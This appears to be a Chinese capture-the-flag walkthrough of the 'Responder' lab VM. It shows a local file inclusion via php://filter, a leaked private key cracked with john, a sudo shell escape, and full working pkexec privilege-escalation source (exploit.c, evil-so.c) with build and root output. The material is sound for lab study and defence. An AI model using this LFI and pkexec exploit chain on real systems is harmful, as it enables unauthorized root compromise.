# 靶场搭建
下载:Responder
Nat,IP: 192.168.1.170
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
目录收集和参数 FUZZ 得到结果:192.168.1.170/filemanager.php?random=/etc/passwd
┌──(root㉿kali)-[~]
└─# curl -s 192.168.1.170/filemanager.php?random=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash
直接读取 filemanager.php 的时候报了 500，改用 php://filter 过滤器读取：
┌──(root㉿kali)-[~]
└─# curl -s "http://192.168.1.170/filemanager.php?random=php://filter/convert.base64-encode/resource=/var/www/html/filemanager.php" | base64 -d
<?php
// filemanager.php, as recovered through php://filter (see the curl above).
// Vulnerable pattern: a request parameter flows straight into include()
// with no allowlist, so any readable path or PHP stream wrapper can be
// pulled in (local file read / local file inclusion, both demonstrated in
// this writeup). A fix maps a fixed set of permitted names to files and
// rejects everything else.
$filename = $_GET['random'];
include($filename);
// header() runs after include(): if the included file already produced
// output, the Location header cannot be sent ("headers already sent"), and
// without an exit after it the script keeps going anyway.
header('Location:/');
// NOTE(review): an encrypted private key committed in a source comment is a
// secret sitting in the web root. Anyone able to read this file, as shown
// above, gets it; its passphrase is recovered by a wordlist attack below.
// Secrets belong outside the document root (or in a secrets store), and a
// key already exposed like this should be treated as compromised.
/*
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4
XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
-----END RSA PRIVATE KEY-----
*/
?>
拿到私钥，连一下。IPv4 连不上，得用 IPv6
┌──(root㉿kali)-[~]
└─# ssh2john id_rsa > id_rsa.hash
┌──(root㉿kali)-[~]
└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elliott (id_rsa)
1g 0:00:00:00 DONE (2024-06-01 09:05) 50.00g/s 169600p/s 169600c/s 169600C/s hellboy..stargirl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali)-[~]
└─# ssh -6 -i id_rsa elliot@fe80::20c:29ff:fee4:d77e%eth0
Enter passphrase for key 'id_rsa':
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) grupos=1001(elliot)
# 提权
elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre
Matching Defaults entries for elliot on responder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elliot may run the following commands on responder:
(rohit) NOPASSWD: /usr/bin/calc
elliot@responder:~$ sudo -u rohit /usr/bin/calc --help
# 出现了:直接!/bin/bash
sudo: unable to resolve host responder: Fallo temporal en la resolución del nombre
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) grupos=1002(rohit)
find / -perm -4000 -type f 2>/dev/null
发现 pkexec,查看版本发现有漏洞
生成两个文件 evil-so.c 和 exploit.c：
// evil-so.c
// Shared-object half of the pkexec local privilege-escalation PoC used in
// this writeup. Built with `gcc -shared -fPIC` (see the build log below).
// It has an effect only when loaded by an already-privileged process:
// for an unprivileged caller setuid(0)/setgid(0) simply fail with EPERM.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Empty stub so the object exports the symbol a gconv module is expected
// to provide; it is never meant to be called with real arguments.
void gconv() {}

// Entry point the gconv loader calls once the module is mapped. Makes
// uid/gid 0 the real identity, clears supplementary groups and then
// replaces the process image with /bin/sh.
void gconv_init() {
    setuid(0);      // return values are ignored: if these fail, the shell
    setgid(0);      // below still starts, just with the caller's identity
    setgroups(0);   // setgroups() lives in <grp.h>, which is not included -
                    // that is the implicit-declaration warning in the build
                    // log. Its real prototype is setgroups(size_t, const
                    // gid_t *); this one-argument call only goes unchecked
                    // because the prototype is missing.
    execve("/bin/sh", NULL, NULL);  // POSIX expects a NULL-terminated argv
                                    // array; a NULL argv relies on Linux
                                    // tolerating it. Failure is not reported.
}
// exploit.c
// Launcher half of the pkexec PoC: stages a fake gconv module directory in
// the current working directory, then executes the setuid pkexec with an
// empty argv and a hand-built environment. Only an unpatched pkexec is
// affected - fixed polkit builds bail out when argc < 1 - and removing the
// setuid bit from pkexec is the documented interim mitigation.
// Artifacts a responder can look for: a directory literally named
// "GCONV_PATH=." and DIR ("evildir") containing a gconv-modules file and a
// copy of the .so, all created by the system() calls in main().
#include <stdio.h>
#include <stdlib.h>
// <unistd.h> is not included, so execve() is implicitly declared; that is
// the warning shown in the build log below.

#define BIN "/usr/bin/pkexec"   // setuid-root target found via find -perm -4000
#define DIR "evildir"           // staging directory for the fake gconv module
#define EVILSO "evil"           // basename of the object built from evil-so.c

int main()
{
    // Environment handed to pkexec. Its unusual shape (envp[0] is a bare
    // path, not a KEY=VALUE pair) together with the empty argv below is the
    // malformed input the unpatched binary mishandles.
    char *envp[] = {
        DIR,
        "PATH=GCONV_PATH=.",
        "SHELL=ryaagard",
        "CHARSET=ryaagard",
        NULL
    };
    char *argv[] = { NULL };   // argc == 0: patched pkexec refuses to run
    // Staging via the shell. Every system() exit status is ignored and all
    // paths are relative to the cwd, so this silently misbehaves when the
    // cwd is not writable or evil.so was not built first.
    system("mkdir GCONV_PATH=.");
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    system("mkdir " DIR);
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    system("cp " EVILSO ".so " DIR);
    execve(BIN, argv, envp);   // returns only on failure; errno is not reported
    return 0;
}
编译运行,拿到 shell
rohit@responder:~$ gcc -shared -o evil.so -fPIC evil-so.c
evil-so.c: In function ‘gconv_init’:
evil-so.c:10:5: warning: implicit declaration of function ‘setgroups’; did you mean ‘getgroups’? [-Wimplicit-function-declaration]
setgroups(0);
^~~~~~~~~
getgroups
rohit@responder:~$ gcc exploit.c -o exploit
exploit.c: In function ‘main’:
exploit.c:25:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
execve(BIN, argv, envp);
^~~~~~
rohit@responder:~$ ./exploit
# cat /root/root.txt
2df90c7733e54427419eee2134ebde5e